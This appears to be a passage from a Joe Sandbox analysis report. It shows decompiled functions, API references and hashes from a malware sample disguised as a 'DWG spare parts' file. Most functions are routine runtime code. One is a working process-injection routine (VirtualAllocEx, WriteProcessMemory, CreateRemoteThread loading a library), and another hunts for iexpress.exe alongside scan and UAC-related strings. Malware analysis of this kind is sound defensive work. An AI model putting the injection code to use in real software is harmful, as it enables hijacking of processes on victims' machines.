                                                                • String ID:
                                                                • API String ID: 2340568224-0
                                                                • Opcode ID: fe3c593d8bdcb299d63d36aa0254aaedc6c819b4b711d8eb9d9b8b496ea26560
                                                                • Instruction ID: 2539e6e6bc665ad3c456b746f2bfee2243ef11c7921ad83d6d6c288f00bb7311
                                                                • Opcode Fuzzy Hash: fe3c593d8bdcb299d63d36aa0254aaedc6c819b4b711d8eb9d9b8b496ea26560
                                                                • Instruction Fuzzy Hash: 3CB09B7AE4C2445FB70997D5F81141863E8F7C87103D14467E005C3540D53554008919
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0251CB27 Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E0251CB27() {
				int _t3;
				void* _t4;

				_t3 = SetErrorMode( *(_t4 - 0xc)); // executed
				return _t3;
			}





                                                                0x0251cb1c
                                                                0x0251cb21

                                                                APIs
                                                                • SetErrorMode.KERNEL32(?,0251CB29), ref: 0251CB1C
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorMode
                                                                • String ID:
                                                                • API String ID: 2340568224-0
                                                                • Opcode ID: 517d7c6c4d04196a39e6175cd8de98f38ae27d2ba23f1f5ea88ef74c85d8f674
                                                                • Instruction ID: e44f4cd709a0251f47b3b433fb5926a70c36a3cdb80dcbe8f649174b542a6985
                                                                • Opcode Fuzzy Hash: 517d7c6c4d04196a39e6175cd8de98f38ae27d2ba23f1f5ea88ef74c85d8f674
                                                                • Instruction Fuzzy Hash: DAA002ADE44109B7EE14B7E4D45485D637D7A883417C14C816115D3004C53B9500CE9A
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 025115FC Relevance: 1.3, APIs: 1, Instructions: 38memoryCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E025115FC(signed int __eax) {
				void* _t4;
				intOrPtr _t7;
				signed int _t8;
				void* _t10;
				void** _t15;
				void* _t17;

				_t8 = __eax;
				E02511590(__eax);
				_t4 = VirtualAlloc(0, 0x140000, 0x1000, 4); // executed
				if(_t4 == 0) {
					 *0x256a718 = 0;
					return 0;
				} else {
					_t15 =  *0x256a704; // 0x2920000
					_t10 = _t4;
					 *_t10 = 0x256a700;
					 *0x256a704 = _t4;
					 *(_t10 + 4) = _t15;
					 *_t15 = _t4;
					_t17 = _t4 + 0x140000;
					 *((intOrPtr*)(_t17 - 4)) = 2;
					 *0x256a718 = 0x13fff0 - _t8;
					_t7 = _t17 - _t8;
					 *0x256a714 = _t7;
					 *(_t7 - 4) = _t8 | 0x00000002;
					return _t7;
				}
			}









                                                                0x025115fd
                                                                0x025115ff
                                                                0x02511612
                                                                0x02511619
                                                                0x0251166a
                                                                0x02511672
                                                                0x0251161b
                                                                0x0251161b
                                                                0x02511621
                                                                0x02511623
                                                                0x02511629
                                                                0x0251162e
                                                                0x02511631
                                                                0x02511635
                                                                0x02511640
                                                                0x0251164d
                                                                0x02511655
                                                                0x02511657
                                                                0x02511664
                                                                0x02511667
                                                                0x02511667

                                                                APIs
                                                                • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,02511A33), ref: 02511612
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocVirtual
                                                                • String ID:
                                                                • API String ID: 4275171209-0
                                                                • Opcode ID: 62d8301f92e6045eb6ad3ceba9c984e5b73d0bf39e26eab1a248e2c471a26d7e
                                                                • Instruction ID: e0106423506dd8e017736b28ac53c7425f64576c0e1ea58932a2a4206dfc20c4
                                                                • Opcode Fuzzy Hash: 62d8301f92e6045eb6ad3ceba9c984e5b73d0bf39e26eab1a248e2c471a26d7e
                                                                • Instruction Fuzzy Hash: 19F090F0B413004FEB05CF7D9AA83167AE2F789308F24847DD20AEB388E77588059B48
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 025116B2 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E025116B2(intOrPtr __eax) {
				void* _t6;
				void** _t9;
				void* _t11;
				void* _t15;
				long _t20;
				intOrPtr _t24;

				_t24 = __eax;
				_t20 = __eax + 0x00010010 - 0x00000001 + 0x00000004 & 0xffff0000;
				_t6 = VirtualAlloc(0, _t20, 0x101000, 4); // executed
				_t11 = _t6;
				if(_t11 != 0) {
					_t15 = _t11;
					 *((intOrPtr*)(_t15 + 8)) = _t24;
					 *(_t15 + 0xc) = _t20 | 0x00000004;
					E02511674();
					_t9 =  *0x256c7a8; // 0x7ef90000
					 *_t15 = 0x256c7a4;
					 *0x256c7a8 = _t11;
					 *(_t15 + 4) = _t9;
					 *_t9 = _t11;
					 *0x256c7a0 = 0;
					_t11 = _t11 + 0x10;
				}
				return _t11;
			}









                                                                0x025116b8
                                                                0x025116c4
                                                                0x025116d4
                                                                0x025116d9
                                                                0x025116dd
                                                                0x025116df
                                                                0x025116e1
                                                                0x025116e7
                                                                0x025116ea
                                                                0x025116ef
                                                                0x025116f4
                                                                0x025116fa
                                                                0x02511700
                                                                0x02511703
                                                                0x02511705
                                                                0x0251170c
                                                                0x0251170c
                                                                0x02511715

                                                                APIs
                                                                • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004), ref: 025116D4
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocVirtual
                                                                • String ID:
                                                                • API String ID: 4275171209-0
                                                                • Opcode ID: ba2253643f692ee830d5d59f450a6325e25ba57fd9da7211b5f35f67cd59bfe0
                                                                • Instruction ID: 5f4ae518de1d5756da4a6c2ff4e71140e340d677933718f810d7c8e21bd240f7
                                                                • Opcode Fuzzy Hash: ba2253643f692ee830d5d59f450a6325e25ba57fd9da7211b5f35f67cd59bfe0
                                                                • Instruction Fuzzy Hash: 3FF090B2A41B956FE7109E9E9C88782BB94FB41322F11417AEA4897340DB70A814CB98
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02511716 Relevance: 1.3, APIs: 1, Instructions: 25COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E02511716(void* __eax) {
				void* _t5;
				signed int _t6;
				signed int _t7;
				void* _t10;
				void* _t13;
				void _t16;

				_t10 = __eax - 0x10;
				E02511674();
				_t5 = _t10;
				_t16 =  *_t5;
				_t13 =  *(_t5 + 4);
				_t6 = VirtualFree(_t10, 0, 0x8000); // executed
				if(_t6 == 0) {
					_t7 = _t6 | 0xffffffff;
				} else {
					 *_t13 = _t16;
					 *(_t16 + 4) = _t13;
					_t7 = 0;
				}
				 *0x256c7a0 = 0;
				return _t7;
			}









                                                                0x0251171d
                                                                0x02511720
                                                                0x02511725
                                                                0x02511727
                                                                0x02511729
                                                                0x02511734
                                                                0x0251173b
                                                                0x02511746
                                                                0x0251173d
                                                                0x0251173d
                                                                0x0251173f
                                                                0x02511742
                                                                0x02511742
                                                                0x02511749
                                                                0x02511753

                                                                APIs
                                                                • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,02512014), ref: 02511734
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FreeVirtual
                                                                • String ID:
                                                                • API String ID: 1263568516-0
                                                                • Opcode ID: a996e0b3432e358706f722012debc8904ec23d1917d6fdcf6d93d9fee7b3f068
                                                                • Instruction ID: 276d92f3cd0a1eaaa806d10a529edcb046e3809e1b1bf65ecc74007780023f7b
                                                                • Opcode Fuzzy Hash: a996e0b3432e358706f722012debc8904ec23d1917d6fdcf6d93d9fee7b3f068
                                                                • Instruction Fuzzy Hash: 04E04F653007019FEB105ABA9D447126A98BF89650F1488A6F649DB251D760E8048B68
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Non-executed Functions

                                                                Function 02515B48 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 139stringlibraryfileCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 83%
                                                                			E02515B48(CHAR* __eax, int __edx) {
				CHAR* _v8;
				int _v12;
				CHAR* _v16;
				void* _v20;
				struct _WIN32_FIND_DATAA _v338;
				char _v599;
				void* _t102;
				intOrPtr* _t103;
				CHAR* _t106;
				CHAR* _t108;
				char* _t109;
				void* _t110;

				_v12 = __edx;
				_v8 = __eax;
				_v16 = _v8;
				_v20 = GetModuleHandleA("kernel32.dll");
				if(_v20 == 0) {
					L4:
					if( *_v8 != 0x5c) {
						_t108 =  &(_v8[2]);
						goto L10;
					} else {
						if(_v8[1] == 0x5c) {
							_t109 = E02515B28( &(_v8[2]));
							if( *_t109 != 0) {
								_t17 = _t109 + 1; // 0x1
								_t108 = E02515B28(_t17);
								if( *_t108 != 0) {
									L10:
									_t102 = _t108 - _v8;
									lstrcpynA( &_v599, _v8, _t102 + 1);
									while( *_t108 != 0) {
										_t106 = E02515B28( &(_t108[1]));
										if(_t106 - _t108 + _t102 + 1 <= 0x105) {
											lstrcpynA( &(( &_v599)[_t102]), _t108, _t106 - _t108 + 1);
											_v20 = FindFirstFileA( &_v599,  &_v338);
											if(_v20 != 0xffffffff) {
												FindClose(_v20);
												if(lstrlenA( &(_v338.cFileName)) + _t102 + 1 + 1 <= 0x105) {
													 *((char*)(_t110 + _t102 - 0x253)) = 0x5c;
													lstrcpynA( &(( &(( &_v599)[_t102]))[1]),  &(_v338.cFileName), 0x105 - _t102 - 1);
													_t102 = _t102 + lstrlenA( &(_v338.cFileName)) + 1;
													_t108 = _t106;
													continue;
												}
											}
										}
										goto L17;
									}
									lstrcpynA(_v8,  &_v599, _v12);
								}
							}
						}
					}
				} else {
					_t103 = GetProcAddress(_v20, "GetLongPathNameA");
					if(_t103 == 0) {
						goto L4;
					} else {
						_push(0x105);
						_push( &_v599);
						_push(_v8);
						if( *_t103() == 0) {
							goto L4;
						} else {
							lstrcpynA(_v8,  &_v599, _v12);
						}
					}
				}
				L17:
				return _v16;
			}















                                                                0x02515b54
                                                                0x02515b57
                                                                0x02515b5d
                                                                0x02515b6a
                                                                0x02515b71
                                                                0x02515bb6
                                                                0x02515bbc
                                                                0x02515bf9
                                                                0x00000000
                                                                0x02515bbe
                                                                0x02515bc5
                                                                0x02515bd6
                                                                0x02515bdb
                                                                0x02515be1
                                                                0x02515be9
                                                                0x02515bee
                                                                0x02515bfc
                                                                0x02515bfe
                                                                0x02515c10
                                                                0x02515cc1
                                                                0x02515c22
                                                                0x02515c30
                                                                0x02515c46
                                                                0x02515c5e
                                                                0x02515c65
                                                                0x02515c6b
                                                                0x02515c87
                                                                0x02515c89
                                                                0x02515cab
                                                                0x02515cbd
                                                                0x02515cbf
                                                                0x00000000
                                                                0x02515cbf
                                                                0x02515c87
                                                                0x02515c65
                                                                0x00000000
                                                                0x02515c30
                                                                0x02515cd9
                                                                0x02515cd9
                                                                0x02515bee
                                                                0x02515bdb
                                                                0x02515bc5
                                                                0x02515b73
                                                                0x02515b81
                                                                0x02515b85
                                                                0x00000000
                                                                0x02515b87
                                                                0x02515b87
                                                                0x02515b92
                                                                0x02515b96
                                                                0x02515b9b
                                                                0x00000000
                                                                0x02515b9d
                                                                0x02515bac
                                                                0x02515bac
                                                                0x02515b9b
                                                                0x02515b85
                                                                0x02515cde
                                                                0x02515ce7

                                                                APIs
                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,02516EE8,02510000,0252D7B4), ref: 02515B65
                                                                • GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 02515B7C
                                                                • lstrcpynA.KERNEL32(?,?,?), ref: 02515BAC
                                                                • lstrcpynA.KERNEL32(?,?,?,kernel32.dll,02516EE8,02510000,0252D7B4), ref: 02515C10
                                                                • lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,02516EE8,02510000,0252D7B4), ref: 02515C46
                                                                • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,02516EE8,02510000,0252D7B4), ref: 02515C59
                                                                • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,02516EE8,02510000,0252D7B4), ref: 02515C6B
                                                                • lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02516EE8,02510000,0252D7B4), ref: 02515C77
                                                                • lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02516EE8,02510000), ref: 02515CAB
                                                                • lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02516EE8), ref: 02515CB7
                                                                • lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 02515CD9
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                • String ID: GetLongPathNameA$\$kernel32.dll
                                                                • API String ID: 3245196872-1565342463
                                                                • Opcode ID: 64772cc9ebd694477b00d19f3aac50c0e09a2706d18eb1cbda9c90cea9b894df
                                                                • Instruction ID: c6b77dae911c6c38ad0231a1b38a2f2768b13bb235d76ce6331ee48e56c99b96
                                                                • Opcode Fuzzy Hash: 64772cc9ebd694477b00d19f3aac50c0e09a2706d18eb1cbda9c90cea9b894df
                                                                • Instruction Fuzzy Hash: 8F416CB1D00619AFEB10DEE8CC88ADEB7ADBB88344F5445E5A559E7200E774DE808F58
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02523E60 Relevance: 22.8, APIs: 8, Strings: 5, Instructions: 75libraryloaderinjectionCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E02523E60(void* __eax, CHAR* __edx) {
				char _v278;
				_Unknown_base(*)()* _v282;
				_Unknown_base(*)()* _v286;
				intOrPtr _v290;
				short _v292;
				intOrPtr _v296;
				char _v297;
				intOrPtr _v301;
				short _v303;
				intOrPtr _v307;
				void _v308;
				long _v312;
				long _v316;
				void* _t32;
				intOrPtr _t34;
				struct HINSTANCE__* _t39;
				void* _t40;
				_Unknown_base(*)()* _t41;
				CHAR** _t42;

				 *_t42 = __edx;
				_t40 = __eax;
				_t34 = 0;
				_t41 = VirtualAllocEx(__eax, 0, 0x123, 0x1000, 0x40);
				if(_t41 != 0) {
					_t20 = _t41;
					_v308 = 0x68;
					_t2 = _t20 + 0x1e; // 0x1e
					_v307 = _t2;
					_v303 = 0x15ff;
					_t5 = _t20 + 0x16; // 0x16
					_v301 = _t5;
					_v297 = 0x68;
					_v296 = 0;
					_v292 = 0x15ff;
					_v290 = _t41 + 0x1a;
					_t39 = GetModuleHandleA("kernel32.dll");
					_v286 = GetProcAddress(_t39, "LoadLibraryA");
					_v282 = GetProcAddress(_t39, "ExitThread");
					lstrcpyA( &_v278,  *_t42);
					WriteProcessMemory(_t40, _t41,  &_v308, 0x123,  &_v316);
					_t32 = CreateRemoteThread(_t40, 0, 0, _t41, 0, 0,  &_v312);
					if(_t32 != 0) {
						CloseHandle(_t32);
						_t34 = 1;
					}
				}
				return _t34;
			}






















                                                                0x02523e6a
                                                                0x02523e6d
                                                                0x02523e6f
                                                                0x02523e85
                                                                0x02523e89
                                                                0x02523e8f
                                                                0x02523e91
                                                                0x02523e96
                                                                0x02523e99
                                                                0x02523e9d
                                                                0x02523ea4
                                                                0x02523ea7
                                                                0x02523eab
                                                                0x02523eb2
                                                                0x02523eb6
                                                                0x02523ec0
                                                                0x02523ece
                                                                0x02523edb
                                                                0x02523eea
                                                                0x02523ef7
                                                                0x02523f0d
                                                                0x02523f21
                                                                0x02523f28
                                                                0x02523f2b
                                                                0x02523f30
                                                                0x02523f30
                                                                0x02523f28
                                                                0x02523f3e

                                                                APIs
                                                                • VirtualAllocEx.KERNEL32(0A74C085,00000000,00000123,00001000,00000040,?,0255D33C,?,?,02524314,?,00000000,025243E7,?,0255D33C,?), ref: 02523E80
                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,0A74C085,00000000,00000123,00001000,00000040,?,0255D33C,?,?,02524314,?,00000000,025243E7,?,0255D33C), ref: 02523EC9
                                                                • GetProcAddress.KERNEL32(00000000,LoadLibraryA), ref: 02523ED6
                                                                • GetProcAddress.KERNEL32(00000000,ExitThread), ref: 02523EE5
                                                                • lstrcpyA.KERNEL32(?,00000000,00000000,ExitThread,00000000,LoadLibraryA,kernel32.dll,0A74C085,00000000,00000123,00001000,00000040,?,0255D33C,?), ref: 02523EF7
                                                                • WriteProcessMemory.KERNEL32(0A74C085,00000000,?,00000123,?,?,00000000,00000000,ExitThread,00000000,LoadLibraryA,kernel32.dll,0A74C085,00000000,00000123,00001000), ref: 02523F0D
                                                                • CreateRemoteThread.KERNEL32(0A74C085,00000000,00000000,00000000,00000000,00000000,?), ref: 02523F21
                                                                • CloseHandle.KERNEL32(00000000,0A74C085,00000000,00000000,00000000,00000000,00000000,?,0A74C085,00000000,?,00000123,?,?,00000000,00000000), ref: 02523F2B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AddressHandleProc$AllocCloseCreateMemoryModuleProcessRemoteThreadVirtualWritelstrcpy
                                                                • String ID: ExitThread$LoadLibraryA$h$h$kernel32.dll
                                                                • API String ID: 3622847927-1073290800
                                                                • Opcode ID: 45e46d235635c0eff6b929831ab98c1bae92f88b6efa45edb43cc19437426771
                                                                • Instruction ID: c9e04813ffaa7fe070d65ca83b16fb8b9798424cf43cb6cc9ca610b87a1a444f
                                                                • Opcode Fuzzy Hash: 45e46d235635c0eff6b929831ab98c1bae92f88b6efa45edb43cc19437426771
                                                                • Instruction Fuzzy Hash: 3921AC712483157AE310DA55CC41FABBAEDEFC6700F408469F584AA2C0E67896088BAA
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02515E18 Relevance: 15.1, APIs: 10, Instructions: 98stringlibrarythreadCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E02515E18() {
				void* _t32;
				CHAR* _t56;
				CHAR* _t57;
				struct HINSTANCE__* _t64;
				void* _t66;

				lstrcpynA(_t66 - 0x11d,  *(_t66 - 4), 0x105);
				GetLocaleInfoA(GetThreadLocale(), 3, _t66 - 0xd, 5);
				_t64 = 0;
				if( *(_t66 - 0x11d) == 0 ||  *(_t66 - 0xd) == 0 &&  *(_t66 - 0x12) == 0) {
					L14:
					return _t64;
				} else {
					_t56 =  &((_t66 - 0x11d)[lstrlenA(_t66 - 0x11d)]);
					L5:
					if( *_t56 != 0x2e && _t56 != _t66 - 0x11d) {
						_t56 = _t56 - 1;
						goto L5;
					}
					_t32 = _t66 - 0x11d;
					if(_t56 != _t32) {
						_t57 =  &(_t56[1]);
						if( *(_t66 - 0x12) != 0) {
							lstrcpynA(_t57, _t66 - 0x12, 0x105 - _t57 - _t32);
							_t64 = LoadLibraryExA(_t66 - 0x11d, 0, 2);
						}
						if(_t64 == 0 &&  *(_t66 - 0xd) != 0) {
							lstrcpynA(_t57, _t66 - 0xd, 0x105 - _t57 - _t66 - 0x11d);
							_t64 = LoadLibraryExA(_t66 - 0x11d, 0, 2);
							if(_t64 == 0) {
								 *((char*)(_t66 - 0xb)) = 0;
								lstrcpynA(_t57, _t66 - 0xd, 0x105 - _t57 - _t66 - 0x11d);
								_t64 = LoadLibraryExA(_t66 - 0x11d, 0, 2);
							}
						}
					}
					goto L14;
				}
			}








                                                                0x02515e28
                                                                0x02515e3b
                                                                0x02515e40
                                                                0x02515e49
                                                                0x02515f32
                                                                0x02515f39
                                                                0x02515e5f
                                                                0x02515e73
                                                                0x02515e78
                                                                0x02515e7b
                                                                0x02515e77
                                                                0x00000000
                                                                0x02515e77
                                                                0x02515e87
                                                                0x02515e8f
                                                                0x02515e95
                                                                0x02515e9a
                                                                0x02515ead
                                                                0x02515ec2
                                                                0x02515ec2
                                                                0x02515ec6
                                                                0x02515ee5
                                                                0x02515efa
                                                                0x02515efe
                                                                0x02515f00
                                                                0x02515f1b
                                                                0x02515f30
                                                                0x02515f30
                                                                0x02515efe
                                                                0x02515ec6
                                                                0x00000000
                                                                0x02515e8f

                                                                APIs
                                                                • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02515E28
                                                                • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02515E35
                                                                • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02515E3B
                                                                • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02515E66
                                                                • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02515EAD
                                                                • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02515EBD
                                                                • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02515EE5
                                                                • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02515EF5
                                                                • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02515F1B
                                                                • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02515F2B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                • API String ID: 1599918012-2375825460
                                                                • Opcode ID: ce2ff861a8847cbd52f8eb7497b8c674a4da7b805932cba2d130268b09d95d30
                                                                • Instruction ID: d261e1388342a62137d07a609d21e738c7401146d0c1b9b1a2b4d39e494f03d9
                                                                • Opcode Fuzzy Hash: ce2ff861a8847cbd52f8eb7497b8c674a4da7b805932cba2d130268b09d95d30
                                                                • Instruction Fuzzy Hash: 5931C771E5021D2AFB25D6B4DC85FDE7BADAB84380F4441E1A308E6080E774DE84CF58
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 025245F8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 42processstringCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E025245F8(CHAR* __eax) {
				char _v280;
				intOrPtr _v308;
				void* _t12;
				CHAR* _t13;
				intOrPtr _t14;
				struct tagPROCESSENTRY32W _t15;

				_t13 = __eax;
				_t14 = 0;
				_t12 = CreateToolhelp32Snapshot(2, 0);
				if(_t12 != 0xffffffff) {
					 *_t15 = 0x128;
					if(Process32First(_t12, _t15) == 0) {
						L5:
						_t14 = 0;
						CloseHandle(_t12);
					} else {
						while(lstrcmpiA( &_v280, _t13) != 0) {
							if(Process32Next(_t12, _t15) != 0) {
								continue;
							} else {
								goto L5;
							}
							goto L6;
						}
						_t14 = _v308;
						CloseHandle(_t12);
					}
				}
				L6:
				return _t14;
			}









                                                                0x02524601
                                                                0x02524603
                                                                0x0252460e
                                                                0x02524613
                                                                0x02524615
                                                                0x02524625
                                                                0x0252464d
                                                                0x0252464d
                                                                0x02524650
                                                                0x02524627
                                                                0x02524627
                                                                0x0252464b
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x0252464b
                                                                0x02524636
                                                                0x0252463b
                                                                0x0252463b
                                                                0x02524625
                                                                0x02524655
                                                                0x02524660

                                                                APIs
                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02524609
                                                                • Process32First.KERNEL32(00000000), ref: 0252461E
                                                                • lstrcmpiA.KERNEL32(?,iexpress.exe,?,?,?,0252950E,iexpress,00000000,OpenSession,0252AD5C,ScanBuffer,0252AD5C,ScanString,0252AD5C,ScanString,0252AD5C), ref: 0252462D
                                                                • CloseHandle.KERNEL32(00000000,?,iexpress.exe,?,?,?,0252950E,iexpress,00000000,OpenSession,0252AD5C,ScanBuffer,0252AD5C,ScanString,0252AD5C,ScanString), ref: 0252463B
                                                                • Process32Next.KERNEL32 ref: 02524644
                                                                • CloseHandle.KERNEL32(00000000,?,?,?,0252950E,iexpress,00000000,OpenSession,0252AD5C,ScanBuffer,0252AD5C,ScanString,0252AD5C,ScanString,0252AD5C,UacInitialize), ref: 02524650
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseHandleProcess32$CreateFirstNextSnapshotToolhelp32lstrcmpi
                                                                • String ID: iexpress.exe
                                                                • API String ID: 3122021977-710937349
                                                                • Opcode ID: 23bb1a003d9cc1d5a696eb2cb7ea938dafb97af319166b9ccbc4cd7e1c885131
                                                                • Instruction ID: 4d84f8062920dd6a5c5b6375d3abe44b53fd77fbcb0632618fea05d49d0d0c3c
                                                                • Opcode Fuzzy Hash: 23bb1a003d9cc1d5a696eb2cb7ea938dafb97af319166b9ccbc4cd7e1c885131
                                                                • Instruction Fuzzy Hash: 36F0E96260133132D6206275CC85F9B698DBFC73B8F050A14B9559B1C1FA28D40886AD
